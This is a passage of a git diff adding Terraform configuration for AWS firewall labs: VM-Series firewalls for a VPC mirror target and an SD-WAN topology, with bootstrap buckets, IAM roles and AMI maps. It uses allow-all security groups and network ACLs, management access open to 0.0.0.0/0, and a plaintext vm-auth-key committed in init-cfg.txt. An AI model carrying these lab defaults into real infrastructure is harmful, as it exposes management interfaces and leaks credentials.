@@ -0,0 +1,72 @@
+//This section should be verified and modified accordingly.
+
+variable aws_region {
+  description = "AWS Region for deployment"
+  default     = "us-east-2"
+}
+
+variable aws_key {
+  description = "aws_key"
+  default     = "AWS-Ohio-Key"
+}
+
+//Do not create these.  The Terraform will do that.  Just need to make secure
+//the s3 bucket names are unique.
+
+
+variable bootstrap_s3bucket3 {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "djs-tgw-bucket-blah-3"
+}
+
+variable bootstrap_s3bucket4 {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "djs-tgw-bucket-blah-4"
+}
+//End of the section that MUST be modified to work
+variable management_cidr {
+  description = "CIDR Address for Management Access"
+  default     = "0.0.0.0/0"
+}
+
+variable vpc_security_cidr {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.0.0/16"
+}
+
+
+#################
+# Mirror Subnets
+#################
+variable vpc_mirror_pub_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.51.0/24"
+}
+
+variable fw_ip_subnet_pub_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.51.45"
+}
+variable fw_ip_subnet_mgmt_1 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.51.44"
+}
+
+variable vpc_mirror_pub_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.61.0/24"
+}
+
+variable fw_ip_subnet_mgmt_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.61.44"
+}
+variable fw_ip_subnet_pub_2 {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.61.45"
+}
+
+#############
+
+
+
diff --git a/aws/VPC_Mirror_Target/vm-series/main.tf b/aws/VPC_Mirror_Target/vm-series/main.tf
new file mode 100644
index 00000000..8543edcd
--- /dev/null
+++ b/aws/VPC_Mirror_Target/vm-series/main.tf
@@ -0,0 +1,154 @@
+variable name {
+  description = "firewall instance name"
+}
+
+variable untrust_subnet_id {}
+variable untrust_security_group_id {}
+variable untrustfwip {}
+variable mgmtfwip {}
+
+
+variable management_subnet_id {}
+variable management_security_group_id {}
+
+variable bootstrap_profile {
+  default = ""
+}
+
+variable bootstrap_s3bucket {}
+
+
+variable aws_region {}
+variable aws_key {}
+
+variable instance_type {
+  default = "m5.xlarge"
+}
+
+variable ngfw_license_type {
+  default = "payg2"
+}
+
+variable ngfw_version {
+  default = "9.0"
+}
+
+variable "license_type_map" {
+  type = "map"
+
+  default = {
+    "byol"  = "6njl1pau431dv1qxipg63mvah"
+    "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km"
+    "payg2" = "806j2of0qy5osgjjixq9gqc6g"
+  }
+}
+
+data "aws_ami" "panw_ngfw" {
+  most_recent = true
+  owners      = ["aws-marketplace"]
+
+  filter {
+    name   = "owner-alias"
+    values = ["aws-marketplace"]
+  }
+
+  filter {
+    name   = "product-code"
+    values = ["${var.license_type_map[var.ngfw_license_type]}"]
+  }
+
+  filter {
+    name   = "name"
+    values = ["PA-VM-AWS-${var.ngfw_version}*"]
+  }
+}
+
+data "aws_region" "current" {
+  name = "${var.aws_region}"
+}
+
+resource "aws_network_interface" "eni-management" {
+  subnet_id         = "${var.management_subnet_id}"
+  private_ips       = ["${var.mgmtfwip}"]
+  security_groups   = ["${var.management_security_group_id}"]
+  source_dest_check = true
+
+  tags {
+    Name = "eni_${var.name}_management"
+  }
+}
+
+
+
+
+
+resource "aws_eip" "eip-management" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-management.id}"
+
+  tags {
+    Name = "eip_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-untrust" {
+  subnet_id         = "${var.untrust_subnet_id}"
+  private_ips       = ["${var.untrustfwip}"]
+  security_groups   = ["${var.untrust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_untrust"
+  }
+}
+
+resource "aws_eip" "eip-untrust" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-untrust.id}"
+
+  tags {
+    Name = "eip_${var.name}_untrust"
+  }
+}
+
+resource "aws_instance" "instance-ngfw" {
+  disable_api_termination              = false
+  instance_initiated_shutdown_behavior = "stop"
+  iam_instance_profile                 = "${var.bootstrap_profile}"
+  user_data                            = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}"
+
+  ebs_optimized = true
+  ami           = "${data.aws_ami.panw_ngfw.image_id}"
+  instance_type = "${var.instance_type}"
+  key_name      = "${var.aws_key}"
+
+  monitoring = false
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.eni-management.id}"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.eni-untrust.id}"
+  }
+
+  
+
+  tags {
+    Name = "${var.name}"
+  }
+}
+
+output "eip_untrust" {
+  value = "${aws_eip.eip-untrust.public_ip}"
+}
+
+output "eip_mgmt" {
+  value = "${aws_eip.eip-management.public_ip}"
+}
+
+output "instanceid" {
+  value = "${aws_instance.instance-ngfw.id}"
+}
diff --git a/aws/VPC_Mirror_Target/vpc_security.tf b/aws/VPC_Mirror_Target/vpc_security.tf
new file mode 100644
index 00000000..089e4a42
--- /dev/null
+++ b/aws/VPC_Mirror_Target/vpc_security.tf
@@ -0,0 +1,176 @@
+data "aws_availability_zones" "available" {}
+
+resource "aws_vpc" "vpc_security" {
+  cidr_block = "${var.vpc_security_cidr}"
+
+  tags {
+    Name = "vpc_security"
+  }
+}
+
+
+#################
+#  Mirror Subnets
+#################
+resource "aws_subnet" "vpc_mirror_pub_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_mirror_pub_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_mirror_pub_1"
+  }
+}
+
+
+resource "aws_subnet" "vpc_mirror_pub_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_mirror_pub_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_mirror_pub_2"
+  }
+}
+
+
+###################
+
+
+
+
+resource "aws_internet_gateway" "vpc_security_igw" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "vpc_securty_igw"
+  }
+}
+
+resource "aws_route" "vpc_security_default" {
+  route_table_id         = "${aws_vpc.vpc_security.default_route_table_id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_internet_gateway.vpc_security_igw.id}"
+}
+
+resource "aws_security_group" "allow_all" {
+  name        = "allow_all"
+  description = "Allow all inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "allow_all_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_all.id}"
+}
+
+resource "aws_security_group_rule" "allow_all_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_all.id}"
+}
+
+resource "aws_security_group" "allow_https_ssh" {
+  name        = "allow_https_ssh"
+  description = "Allow HTTPS and SSH inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "allow_ssh_ingress" {
+  type        = "ingress"
+  from_port   = 22
+  to_port     = 22
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+resource "aws_security_group_rule" "allow_https_ingress" {
+  type        = "ingress"
+  from_port   = 443
+  to_port     = 443
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+resource "aws_security_group_rule" "allow_all" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.allow_https_ssh.id}"
+}
+
+###################
+# VPC Mirror FWs
+###################
+module "ngfw3" {
+  source = "./vm-series/"
+
+  name = "ngfw3"
+
+  aws_key = "${var.aws_key}"
+
+  
+
+  untrust_subnet_id         = "${aws_subnet.vpc_mirror_pub_1.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_pub_1}"
+
+  management_subnet_id         = "${aws_subnet.vpc_mirror_pub_1.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+  mgmtfwip                     = "${var.fw_ip_subnet_mgmt_1}"
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile3.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket3}"
+
+  
+
+  aws_region = "${var.aws_region}"
+}
+module "ngfw4" {
+  source = "./vm-series/"
+
+  name = "ngfw4"
+
+  aws_key = "${var.aws_key}"
+
+  
+
+  untrust_subnet_id         = "${aws_subnet.vpc_mirror_pub_2.id}"
+  untrust_security_group_id = "${aws_security_group.allow_all.id}"
+  untrustfwip               = "${var.fw_ip_subnet_pub_2}"
+  
+  management_subnet_id         = "${aws_subnet.vpc_mirror_pub_2.id}"
+  management_security_group_id = "${aws_security_group.allow_https_ssh.id}"
+  mgmtfwip                     = "${var.fw_ip_subnet_mgmt_2}"
+
+  bootstrap_profile  = "${aws_iam_instance_profile.bootstrap_profile4.id}"
+  bootstrap_s3bucket = "${var.bootstrap_s3bucket4}"
+
+  
+
+  aws_region = "${var.aws_region}"
+}
+#######################
+
+output "FW-3-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw3.eip_mgmt}"
+}
+output "FW-4-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw4.eip_mgmt}"
+}
diff --git a/aws/sdwan-lab/access-control-lists.tf b/aws/sdwan-lab/access-control-lists.tf
new file mode 100644
index 00000000..2ffce3a5
--- /dev/null
+++ b/aws/sdwan-lab/access-control-lists.tf
@@ -0,0 +1,26 @@
+resource "aws_network_acl" "allow-all" {
+  vpc_id = "${aws_vpc.SDWAN.id}"
+  subnet_ids = ["${aws_subnet.SD-WAN-MGT.id}","${aws_subnet.SD-WAN-WAN1.id}","${aws_subnet.SD-WAN-WAN2.id}","${aws_subnet.SD-WAN-WAN3.id}","${aws_subnet.SD-WAN-WAN4.id}","${aws_subnet.SD-WAN-MPLS.id}","${aws_subnet.SD-WAN-Branch25.id}","${aws_subnet.SD-WAN-Branch50.id}","${aws_subnet.SD-WAN-Hub.id}",]
+
+  egress {
+    protocol   = "-1"
+    rule_no    = 2
+    action     = "allow"
+    cidr_block = "0.0.0.0/0"
+    from_port  = 0
+    to_port    = 0
+  }
+
+  ingress {
+    protocol   = "-1"
+    rule_no    = 1
+    action     = "allow"
+    cidr_block = "0.0.0.0/0"
+    from_port  = 0
+    to_port    = 0
+  }
+
+  tags {
+    Name = "allow-all"
+  }
+}
\ No newline at end of file
diff --git a/aws/sdwan-lab/aws_vars.tf b/aws/sdwan-lab/aws_vars.tf
new file mode 100644
index 00000000..d2ad45d7
--- /dev/null
+++ b/aws/sdwan-lab/aws_vars.tf
@@ -0,0 +1,121 @@
+variable "aws_region" {}
+#variable "aws_access_key" {}
+#variable "aws_secret_key" {}
+variable "VPC-Name" {}
+variable "SD-WAN-HUB-FW" {}
+variable "SD-WAN-HUB-SVR" {}
+variable "SD-WAN-ROUTER-JITTER" {}
+variable "SD-WAN-BRANCH25-FW" {}
+variable "SD-WAN-BRANCH50-FW" {}
+variable "SD-WAN-BRANCH25-IWS" {}
+variable "SD-WAN-BRANCH50-IWS" {}
+variable "VPCCIDR" {}
+variable "SD-WAN-MGT" {}
+variable "SD-WAN-WAN1" {}
+variable "SD-WAN-WAN2" {}
+variable "SD-WAN-WAN3" {}
+variable "SD-WAN-WAN4" {}
+variable "SD-WAN-MPLS" {}
+variable "SD-WAN-Branch25" {}
+variable "SD-WAN-Branch50" {}
+variable "SD-WAN-Hub" {}
+variable "ServerKeyName" {}
+
+#VMSeries 9.0.3-xfr BYOL 
+variable "PANFWRegionMap" {
+  type = "map"
+
+  default = {
+    "ap-northeast-1" = "ami-04bd06018d53fd939"
+
+    "ap-northeast-2" = "ami-0566141c898e243fc"
+
+    "ap-south-1" = "ami-0ef9ba2fb8c8b2f23"
+
+    "ap-southeast-1" = "ami-023496caf9aedcbb5"
+
+    "ap-southeast-2" = "ami-08399a38c19098edb"
+
+    "ca-central-1" = "ami-0f4812911392bee42"
+
+    "eu-central-1" = "ami-04102d137edd8a952"
+
+    "eu-north-1" = "ami-d59d17ab"
+
+    "eu-west-1" = "ami-09312982f28611e13"
+
+    "eu-west-2" = "ami-0063940db47af7581"
+
+    "eu-west-3" = "ami-07a4c669069e02995"
+
+    "sa-east-1" = "ami-077e676dce3d06231"
+
+    "us-east-1" = "ami-0ec2529b60a7fff22"
+
+    "us-east-2" = "ami-06efcb94b48d8263c"
+
+    "us-west-1" = "ami-03801628148e17514"
+
+    "us-west-2" = "ami-05a457c9f5f6a45e0"
+  }
+}
+variable "PanoramaRegionMap" {
+  type = "map"
+  #Panorama 9.0.5
+  default = {
+    "ap-northeast-1" = "ami-08e8bded936bbd795"
+
+    "ap-northeast-2" = "ami-0569a43a1ab4864e0"
+
+    "ap-south-1" = "ami-01e194040c88ec7f7"
+
+    "ap-southeast-1" = "ami-05946a342e4f38c79"
+
+    "ap-southeast-2" = "ami-060009b850df3908c"
+
+    "ca-central-1" = "ami-042b6efd5f827ea88"
+
+    "eu-central-1" = "ami-0d4a11e11365c9bae"
+
+    "eu-north-1" = "ami-0d274936829f13359"
+
+    "eu-west-1" = "ami-06a1715befd746fe4"
+
+    "eu-west-2" = "ami-03a4a370ee5442bac"
+
+    "eu-west-3" = "ami-0637f615e0f748d62"
+
+    "sa-east-1" = "ami-091669d04559b7056"
+
+    "us-east-1" = "ami-0fd6fc67d9f2e7750"
+
+    "us-east-2" = "ami-013c503f1741aa646"
+
+    "us-west-1" = "ami-02e821dd4b602e9ec"
+
+    "us-west-2" = "ami-0403335c2e31d2a81"
+  }
+}
+variable "UbuntuRegionMap" {
+  type = "map"
+
+  #Ubuntu Server 18.04 LTS (HVM)
+  default = {
+    "ap-northeast-1" = "ami-014cc8d7cb6d26dc8"
+    "ap-northeast-2" = "ami-004b3430b806f3b1a"
+    "ap-south-1" = "ami-0f59afa4a22fad2f0"
+    "ap-southeast-1" = "ami-08b3278ea6e379084"
+    "ap-southeast-2" = "ami-00d7116c396e73b04"
+    "ca-central-1" = "ami-0086bcfbab4b22f60"
+    "eu-central-1" = "ami-0062c497b55437b01"
+    "eu-north-1" = "ami-0ca3b50bc99a41773"
+    "eu-west-1" = "ami-0987ee37af7792903"
+    "eu-west-2" = "ami-05945867d79b7d926"
+    "eu-west-3" = "ami-00c60f4df93ff408e"
+    "sa-east-1" = "ami-0fb487b6f6ab53ff"
+    "us-east-1" = "ami-09f9d773751b9d606"
+    "us-east-2" = "ami-0891395d749676c2e"
+    "us-west-1" = "ami-0c0e5a396959508b0"
+    "us-west-2" = "ami-0bbe9b07c5fe8e86e"
+  }
+}
diff --git a/aws/sdwan-lab/branch25-fw-bootstrap.tf b/aws/sdwan-lab/branch25-fw-bootstrap.tf
new file mode 100644
index 00000000..678d93cc
--- /dev/null
+++ b/aws/sdwan-lab/branch25-fw-bootstrap.tf
@@ -0,0 +1,56 @@
+# Create a BootStrap S3 Bucket
+
+resource "random_id" "branch25-fw-bucket_prefix" {
+  byte_length = 4
+}
+
+resource "aws_s3_bucket" "branch25-fw-bootstrap-bucket" {
+  #branch25-fw-bucket_prefix = "${var.branch25-fw-bucket_prefix}"
+  bucket        = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "branch25-fw-bootstrap-bucket"
+  }
+}
+
+#resource "aws_s3_bucket_object" "branch25-fw-bootstrap_xml" {
+#  depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"]
+#  bucket     = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}"
+#  acl        = "private"
+#  key        = "config/bootstrap.xml"
+#  source     = "branch25-fw-bootstrap/bootstrap.xml"
+#}
+
+resource "aws_s3_bucket_object" "branch25-fw-init-cft_txt" {
+  bucket     = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "config/init-cfg.txt"
+  source     = "branch25-fw-bootstrap/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "branch25-fw-software" {
+  bucket     = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "software/"
+  source     = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "branch25-fw-license" {
+  bucket     = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "license/"
+  source     = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "branch25-fw-content" {
+  bucket     = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "content/"
+  source     = "/dev/null"
+}
diff --git a/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt b/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt
new file mode 100644
index 00000000..ee4b3c1f
--- /dev/null
+++ b/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+vm-auth-key=649475581476015
+panorama-server=52.35.104.230
+panorama-server-2=
+tplname=tgw-vpc-az1-stack
+dgname=tgw-vpc-az1
+dns-primary=
+dns-secondary=
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
\ No newline at end of file
diff --git a/aws/sdwan-lab/branch25-fw.tf b/aws/sdwan-lab/branch25-fw.tf
new file mode 100644
index 00000000..0a274368
--- /dev/null
+++ b/aws/sdwan-lab/branch25-fw.tf
@@ -0,0 +1,138 @@
+resource "aws_iam_role" "branch25-fw-bootstraprole" {
+  name = "branch25-fw-bootstraprole-${random_id.sdwan.hex}"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "branch25-fw-bootstrappolicy" {
+  name = "branch25-fw-bootstrappolicy-${random_id.sdwan.hex}"
+  role = "${aws_iam_role.branch25-fw-bootstraprole.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.branch25-fw-bootstrap-bucket.bucket}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${aws_s3_bucket.branch25-fw-bootstrap-bucket.bucket}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "branch25-fw-bootstrapinstanceprofile" {
+  name = "branch25-fw-bootstrapinstanceprofile${random_id.sdwan.hex}"
+  role = "${aws_iam_role.branch25-fw-bootstraprole.name}"
+  path = "/"
+}
+resource "aws_network_interface" "branch25-fw-mgt" {
+  subnet_id         = "${aws_subnet.SD-WAN-MGT.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = true
+  private_ips       = ["100.64.0.25"]
+}
+
+resource "aws_network_interface" "branch25-fw-wan1" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN1.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.1.25"]
+}
+
+resource "aws_network_interface" "branch25-fw-wan2" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN2.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.2.25"]
+}
+
+resource "aws_network_interface" "branch25-fw-branch25" {
+  subnet_id         = "${aws_subnet.SD-WAN-Branch25.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.25.254"]
+}
+
+resource "aws_network_interface" "branch25-fw-mpls" {
+  subnet_id         = "${aws_subnet.SD-WAN-MPLS.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.5.25"]
+}
+
+resource "aws_eip_association" "branch25-fw-mgt-Association" {
+  network_interface_id = "${aws_network_interface.branch25-fw-mgt.id}"
+  allocation_id        = "${aws_eip.branch25-fw-mgt.id}"
+}
+
+#Deploys the firewalls
+
+resource "aws_instance" "branch25-fw" {
+  tags {
+    Name = "Branch25-fw"
+  }
+
+  disable_api_termination = false
+
+  iam_instance_profile = "${aws_iam_instance_profile.branch25-fw-bootstrapinstanceprofile.name}"
+  ebs_optimized        = true
+  ami                  = "${var.SD-WAN-BRANCH25-FW}"
+  instance_type        = "m5.4xlarge"
+  depends_on           = ["aws_internet_gateway.SDWAN-IGW"]
+
+  ebs_block_device {
+    device_name           = "/dev/xvda"
+    volume_type           = "gp2"
+    delete_on_termination = true
+    volume_size           = 60
+  }
+
+  key_name   = "${var.ServerKeyName}"
+  monitoring = false
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.branch25-fw-mgt.id}"
+  }
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.branch25-fw-wan1.id}"
+  }
+
+  network_interface {
+    device_index         = 2
+    network_interface_id = "${aws_network_interface.branch25-fw-wan2.id}"
+  }
+
+  network_interface {
+    device_index         = 3
+    network_interface_id = "${aws_network_interface.branch25-fw-branch25.id}"
+  }
+
+  network_interface {
+    device_index         = 4
+    network_interface_id = "${aws_network_interface.branch25-fw-mpls.id}"
+  }
+  user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", "${aws_s3_bucket.branch25-fw-bootstrap-bucket.bucket}")))}"
+}
diff --git a/aws/sdwan-lab/branch50-fw-bootstrap.tf b/aws/sdwan-lab/branch50-fw-bootstrap.tf
new file mode 100644
index 00000000..f533b304
--- /dev/null
+++ b/aws/sdwan-lab/branch50-fw-bootstrap.tf
@@ -0,0 +1,56 @@
+# Create a BootStrap S3 Bucket
+
+resource "random_id" "branch50-fw-bucket_prefix" {
+  byte_length = 4
+}
+
+resource "aws_s3_bucket" "branch50-fw-bootstrap-bucket" {
+  #branch50-fw-bucket_prefix = "${var.branch50-fw-bucket_prefix}"
+  bucket        = "branch50-fw-${lower(random_id.branch50-fw-bucket_prefix.hex)}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "branch50-fw-bootstrap-bucket"
+  }
+}
+
+#resource "aws_s3_bucket_object" "branch50-fw-bootstrap_xml" {
+#  depends_on = ["aws_s3_bucket.branch50-fw-bootstrap-bucket"]
+#  bucket     = "branch50-fw-${lower(random_id.branch50-fw-bucket_prefix.hex)}"
+#  acl        = "private"
+#  key        = "config/bootstrap.xml"
+#  source     = "branch50-fw-bootstrap/bootstrap.xml"
+#}
+
+resource "aws_s3_bucket_object" "branch50-fw-init-cft_txt" {
+  bucket     = "branch50-fw-${lower(random_id.branch50-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch50-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "config/init-cfg.txt"
+  source     = "branch50-fw-bootstrap/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "branch50-fw-software" {
+  bucket     = "branch50-fw-${lower(random_id.branch50-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch50-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "software/"
+  source     = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "branch50-fw-license" {
+  bucket     = "branch50-fw-${lower(random_id.branch50-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch50-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "license/"
+  source     = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "branch50-fw-content" {
+  bucket     = "branch50-fw-${lower(random_id.branch50-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.branch50-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "content/"
+  source     = "/dev/null"
+}
diff --git a/aws/sdwan-lab/branch50-fw-bootstrap/init-cfg.txt b/aws/sdwan-lab/branch50-fw-bootstrap/init-cfg.txt
new file mode 100644
index 00000000..ee4b3c1f
--- /dev/null
+++ b/aws/sdwan-lab/branch50-fw-bootstrap/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+vm-auth-key=649475581476015
+panorama-server=52.35.104.230
+panorama-server-2=
+tplname=tgw-vpc-az1-stack
+dgname=tgw-vpc-az1
+dns-primary=
+dns-secondary=
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
\ No newline at end of file
diff --git a/aws/sdwan-lab/branch50-fw.tf b/aws/sdwan-lab/branch50-fw.tf
new file mode 100644
index 00000000..2c2573da
--- /dev/null
+++ b/aws/sdwan-lab/branch50-fw.tf
@@ -0,0 +1,140 @@
+resource "aws_iam_role" "branch50-fw-bootstraprole" {
+  name = "branch50-fw-bootstraprole-${random_id.sdwan.hex}"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "branch50-fw-bootstrappolicy" {
+  name = "branch50-fw-bootstrappolicy-${random_id.sdwan.hex}"
+  role = "${aws_iam_role.branch50-fw-bootstraprole.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.branch50-fw-bootstrap-bucket.bucket}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${aws_s3_bucket.branch50-fw-bootstrap-bucket.bucket}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "branch50-fw-bootstrapinstanceprofile" {
+  name = "branch50-fw-bootstrapinstanceprofile${random_id.sdwan.hex}"
+  role = "${aws_iam_role.branch50-fw-bootstraprole.name}"
+  path = "/"
+}
+
+resource "aws_network_interface" "branch50-fw-mgt" {
+  subnet_id         = "${aws_subnet.SD-WAN-MGT.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = true
+  private_ips       = ["100.64.0.50"]
+}
+
+resource "aws_network_interface" "branch50-fw-wan1" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN1.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.1.50"]
+}
+
+resource "aws_network_interface" "branch50-fw-wan2" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN2.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.2.50"]
+}
+
+resource "aws_network_interface" "branch50-fw-branch50" {
+  subnet_id         = "${aws_subnet.SD-WAN-Branch50.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.50.254"]
+}
+
+resource "aws_network_interface" "branch50-fw-mpls" {
+  subnet_id         = "${aws_subnet.SD-WAN-MPLS.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.5.50"]
+}
+
+resource "aws_eip_association" "branch50-fw-mgt-Association" {
+  network_interface_id = "${aws_network_interface.branch50-fw-mgt.id}"
+  allocation_id        = "${aws_eip.branch50-fw-mgt.id}"
+}
+
+#Deploys the firewalls
+
+resource "aws_instance" "branch50-fw" {
+  tags {
+    Name = "Branch50-fw"
+  }
+
+  disable_api_termination = false
+
+  iam_instance_profile = "${aws_iam_instance_profile.branch50-fw-bootstrapinstanceprofile.name}"
+  ebs_optimized        = true
+  ami                  = "${var.SD-WAN-BRANCH50-FW}"
+  instance_type        = "m5.4xlarge"
+  depends_on           = ["aws_internet_gateway.SDWAN-IGW"]
+
+
+  ebs_block_device {
+    device_name           = "/dev/xvda"
+    volume_type           = "gp2"
+    delete_on_termination = true
+    volume_size           = 60
+  }
+
+  key_name   = "${var.ServerKeyName}"
+  monitoring = false
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.branch50-fw-mgt.id}"
+  }
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.branch50-fw-wan1.id}"
+  }
+
+  network_interface {
